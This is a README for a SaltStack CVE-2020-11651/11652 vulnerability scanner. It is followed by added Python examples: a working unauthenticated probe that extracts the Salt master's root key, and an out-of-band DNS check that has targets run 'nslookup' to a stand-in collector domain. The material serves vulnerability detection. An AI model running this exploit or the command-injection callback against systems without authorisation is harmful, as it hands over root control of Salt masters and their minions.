Scanning tool to test for SaltStack vulnerabilities CVE-2020-11651 & CVE-2020-11652.
appcheck-ng/salt-rce-scanner-CVE-2020-11651-CVE-2020-11652
[1] What is it?

Scanning tool to test for the SaltStack vulnerabilities CVE-2020-11651 and CVE-2020-11652. The vulnerabilities allow an attacker who can connect to the "request server" port (TCP 4506 by default) to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the "master" server filesystem, and steal the secret key used to authenticate to the master as root. The impact is full remote command execution as root on both the master and all minions that connect to it.

[2] How to install it

The tool requires Python 2.7 or Python 3. External requirements can be installed with pip or easy_install, for example:

```
sudo pip install -r requirements.txt
```

[3] How to use it?

There are 2 detection methods included:

* Token disclosure (-t)

  Attempts to read the Salt root key by exploiting the authentication bypass. This method is self-contained (no out-of-band infrastructure is needed), but it only works against newer Salt versions; some older versions are not supported, so a negative result from -t alone does not prove that a host is patched.

* Remote Code Execution to Out-of-Band (DNS) (-c)

  Exploits the flaw by executing the nslookup command on the target to trigger a DNS lookup to the AppCheck Sentinel server. The scanner then consults the AppCheck DNS server to determine whether the command executed. To achieve this the tool needs to connect out to https://ptst.io/. Note that this check runs a command on the target, and that the target only needs to be able to resolve DNS names (not reach the internet directly) for the lookup to arrive at Sentinel. For further information on Sentinel see section [4] below.

Recommended command line:

```
salt_rce_scanner.py -r cidr_ip_range -t -c
```

[Command Line Options]

```
  ___              _____ _               _
 / _ \            /  __ \ |             | |
/ /_\ \_ __  _ __ | /  \/ |__   ___  ___| | __
|  _  | '_ \| '_ \| |   | '_ \ / _ \/ __| |/ /
| | | | |_) | |_) | \__/\ | | |  __/ (__|   <
\_| |_/ .__/| .__/ \____/_| |_|\___|\___|_|\_\
      | |   | |
      |_|   |_|

SaltStack Scanner (CVE-2020-11651 & CVE-2020-11652)
Author: Gary O'Leary-Steele
Version: 0.1 Alpha

Use -h to see usage options

optional arguments:
  -h, --help      show this help message and exit
  -r CIDR_RANGE   Target Host or CIDR Range to scan
  -p PORT         Target Port (4506 by default)
  -c              Enable remote command injection test (out-of-band DNS to AppCheck Sentinel)
  -t              Enable root token disclosure check
  -T THREADS      Maximum Threads (default is 50)
  -o OUTPUT_FILE  Output file
```

[4] AppCheck Sentinel

= Background =

Traditionally, web application security flaws are detected by modifying client-supplied input in an attempt to trigger a specific response from the server. For example, SQL injection flaws are often detected by submitting payloads that cause a recognisable signature (such as a database error) to be returned by the server; in other cases, payloads are designed to trigger a specific time delay that can be measured to detect the flaw. In each case these are in-band techniques: both the attack and the response take the same path as regular website traffic and give immediate confirmation of the vulnerability.

= Out-of-Band Detection =

There are cases, however, where in-band techniques are not effective. For example, consider an e-commerce site that collects orders which are then reviewed later via a back-end order processing system. Whilst AppCheck will detect vulnerabilities (in-band) within the e-commerce site during a routine scan, vulnerabilities within the back-end order processing system may not trigger until the stored data is accessed (by another user or process) later down the line. Other common cases arise when triggering the vulnerability does not provide a reliable in-band mechanism to confirm the flaw: measuring server response times is unreliable if normal response times are erratic, and in other cases the vulnerability does not affect the server's response at all, regardless of whether it is successfully exploited.

To overcome these restrictions, AppCheck implements an out-of-band detection system named Sentinel. Sentinel is a cloud-based monitoring system that hosts specially designed DNS, SMTP, HTTP(S) and SMB services that intercept out-of-band connections triggered by an AppCheck attack payload. During a scan, AppCheck submits specially crafted payloads designed to trigger out-of-band connections when they are successfully executed; Sentinel detects this execution and updates the scan results accordingly.

One of the most common techniques is the use of DNS tokens embedded within the payload. By design, DNS queries are forwarded to the authoritative DNS server for a given domain in order to be resolved. Therefore, even if the vulnerable system is not permitted to access the internet, as long as it is able to resolve DNS names it can communicate with Sentinel.
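The token disclosure check of section [3], shown as an added example that is not the scanner's own code. The request is a clear-text (`enc: clear`) msgpack envelope sent to the ZeroMQ request server on port 4506 naming the internal `_prep_auth_info` method, and an unpatched master answers with a four-element reply whose third element is a key dict containing `root`. Both wire shapes are stated here from the editor's understanding of Salt's ClearFuncs and should be treated as assumptions; the hand-written msgpack subset stands in for the msgpack package so the offline parts run without dependencies, and `check_master` is the only function that needs pyzmq.

```python
import struct

# Minimal MessagePack codec (nil, bool, int, str, bin, array, map) written for
# this example so it runs without the msgpack or pyzmq packages; not Salt's code.
_LEN = {0xC4: (1, "bin"), 0xC5: (2, "bin"), 0xC6: (4, "bin"),
        0xD9: (1, "str"), 0xDA: (2, "str"), 0xDB: (4, "str"),
        0xCC: (1, "uint"), 0xCD: (2, "uint"), 0xCE: (4, "uint"), 0xCF: (8, "uint"),
        0xDC: (2, "array"), 0xDD: (4, "array"), 0xDE: (2, "map"), 0xDF: (4, "map")}


def mp_dumps(obj):
    if obj is None:
        return b"\xc0"
    if isinstance(obj, bool):  # bool before int: bool is an int subclass
        return b"\xc3" if obj else b"\xc2"
    if isinstance(obj, int) and 0 <= obj <= 0xFFFFFFFF:
        return bytes([obj]) if obj < 0x80 else b"\xce" + struct.pack(">I", obj)
    if isinstance(obj, str):
        data = obj.encode("utf-8")
        if len(data) < 0x20:
            return bytes([0xA0 | len(data)]) + data
        return b"\xda" + struct.pack(">H", len(data)) + data
    if isinstance(obj, (list, tuple)):
        head = bytes([0x90 | len(obj)]) if len(obj) < 16 else b"\xdc" + struct.pack(">H", len(obj))
        return head + b"".join(mp_dumps(x) for x in obj)
    if isinstance(obj, dict):
        head = bytes([0x80 | len(obj)]) if len(obj) < 16 else b"\xde" + struct.pack(">H", len(obj))
        return head + b"".join(mp_dumps(k) + mp_dumps(v) for k, v in obj.items())
    raise TypeError("unsupported type: %r" % type(obj))


def _decode(buf, i):
    b = buf[i]
    i += 1
    if b <= 0x7F or b >= 0xE0:  # positive / negative fixint
        return (b if b <= 0x7F else b - 0x100), i
    if b == 0xC0:
        return None, i
    if b in (0xC2, 0xC3):
        return b == 0xC3, i
    if 0x80 <= b <= 0x8F:  # fixmap
        n, kind = b & 0x0F, "map"
    elif 0x90 <= b <= 0x9F:  # fixarray
        n, kind = b & 0x0F, "array"
    elif 0xA0 <= b <= 0xBF:  # fixstr
        n, kind = b & 0x1F, "str"
    elif b in _LEN:  # families carrying an explicit length field
        size, kind = _LEN[b]
        n = int.from_bytes(buf[i:i + size], "big")
        i += size
    else:
        raise ValueError("unsupported msgpack type byte 0x%02x" % b)
    if kind == "uint":
        return n, i
    if kind == "bin":
        return bytes(buf[i:i + n]), i + n
    if kind == "str":
        return buf[i:i + n].decode("utf-8"), i + n
    items = []
    for _ in range(n * (2 if kind == "map" else 1)):  # maps hold n key/value pairs
        item, i = _decode(buf, i)
        items.append(item)
    return (dict(zip(items[0::2], items[1::2])) if kind == "map" else items), i


def mp_loads(data):
    obj, end = _decode(data, 0)
    if end != len(data):
        raise ValueError("trailing bytes after msgpack object")
    return obj


def build_prep_auth_info_request():
    """Clear-text envelope for the request server; '_prep_auth_info' is the internal
    ClearFuncs method an unpatched master dispatches without authentication."""
    return mp_dumps({"enc": "clear", "load": {"cmd": "_prep_auth_info"}})


def extract_root_key(reply):
    """Root key if the reply has the assumed vulnerable shape
    (auth_type, error_name, {'root': key, ...}, sensitive_keys), else None."""
    try:
        ret = mp_loads(reply)
    except (ValueError, IndexError, UnicodeDecodeError):
        return None  # malformed, empty, or a type this subset does not decode
    if isinstance(ret, list) and len(ret) >= 3 and isinstance(ret[2], dict):
        key = ret[2].get("root")
        if isinstance(key, bytes):
            key = key.decode("utf-8", "replace")
        if isinstance(key, str) and key:
            return key
    return None  # patched masters refuse the command and answer with another shape


def check_master(host, port=4506, timeout=5.0):
    """Live probe over a ZeroMQ REQ socket (needs pyzmq); root key or None."""
    import zmq  # imported lazily so the offline helpers above need no pyzmq
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REQ)
    sock.setsockopt(zmq.LINGER, 0)
    sock.setsockopt(zmq.RCVTIMEO, int(timeout * 1000))
    sock.setsockopt(zmq.SNDTIMEO, int(timeout * 1000))
    try:
        sock.connect("tcp://%s:%d" % (host, port))
        sock.send(build_prep_auth_info_request())
        return extract_root_key(sock.recv())
    except zmq.ZMQError:
        return None  # timeout or refused connection: treat as not confirmed
    finally:
        sock.close()
        ctx.term()
```

`check_master("192.0.2.10")` performs the same kind of probe the -t option does: it only reads, publishing nothing to minions. A `None` result means the master either refused the command or replied in a shape this check does not recognise, which matches the README's caveat that -t cannot confirm older versions; do not read it as proof that the host is patched.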
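The DNS-token correlation that section [4] describes, as an added example that is not AppCheck's or Sentinel's code. The collector domain `oob.example.net`, the BIND-style query log lines and the log format are all constructed stand-ins: the real scanner asks the Sentinel service over HTTPS (https://ptst.io/) whether a token was seen, whereas this example reads the authoritative server's query log directly.

```python
import re
import secrets

# Assumed collector domain; the real Sentinel domain is not on the page.
COLLECTOR_DOMAIN = "oob.example.net"

# Matches the queried name in a BIND-style query log line (constructed format).
_QNAME = re.compile(r"query:\s+(\S+)\s+IN\s+\S+")


def new_token():
    """Unguessable per-target label. Lowercase hex survives resolvers that
    randomise query case (0x20 encoding); correlation below lowercases anyway."""
    return secrets.token_hex(8)


def nslookup_payload(token, domain=COLLECTOR_DOMAIN):
    """Command a -c style check would run on the target. The name is only
    resolvable by the domain's authoritative server, i.e. the collector, so the
    target needs working DNS but no direct internet access."""
    return "nslookup %s.%s" % (token, domain)


def tokens_seen(log_lines, domain=COLLECTOR_DOMAIN):
    """Labels queried directly under the collector domain, case-folded."""
    seen = set()
    suffix = "." + domain.lower()
    for line in log_lines:
        m = _QNAME.search(line)
        if not m:
            continue
        qname = m.group(1).lower().rstrip(".")
        if qname.endswith(suffix):
            seen.add(qname[:-len(suffix)].split(".")[-1])
    return seen


def correlate(issued, log_lines, domain=COLLECTOR_DOMAIN):
    """issued maps token -> target; returns target -> whether its token fired.
    Matching is by token only: the log's client address is the target's
    recursive resolver, not the target itself, so it cannot identify the host."""
    seen = tokens_seen(log_lines, domain)
    return {target: token in seen for token, target in issued.items()}


# Constructed sample: one hit (queried twice, once with randomised case), one
# unrelated query, and one token-shaped name under a different domain.
SAMPLE_LOG = [
    "03-May-2020 14:02:11.512 client 198.51.100.7#41234 (1f9d2a7c0b3e4d55.oob.example.net): "
    "query: 1f9d2a7c0b3e4d55.oob.example.net IN A + (203.0.113.10)",
    "03-May-2020 14:02:11.530 client 198.51.100.7#41235 (1F9D2A7C0B3E4D55.oob.example.net): "
    "query: 1F9D2A7C0B3E4D55.oob.example.net IN AAAA + (203.0.113.10)",
    "03-May-2020 14:02:14.001 client 192.0.2.9#53000 (www.example.org): "
    "query: www.example.org IN A + (203.0.113.10)",
    "03-May-2020 14:02:15.777 client 198.51.100.8#41300 (deadbeefcafe0001.other-domain.test): "
    "query: deadbeefcafe0001.other-domain.test IN A + (203.0.113.10)",
]

# Constructed issuance table: token -> scanned target.
ISSUED = {
    "1f9d2a7c0b3e4d55": "10.0.0.5",
    "a0b1c2d3e4f5a6b7": "10.0.0.6",
    "deadbeefcafe0001": "10.0.0.7",
}
```

Running `correlate(ISSUED, SAMPLE_LOG)` on the constructed data confirms only `10.0.0.5`: its token was queried (in both cases), the second token never appeared, and the third appeared only under a foreign domain, which a collector must ignore or any attacker-controlled zone could forge confirmations. Because confirmation arrives out of band, a scan should wait a short grace period for slow resolvers before reading the log.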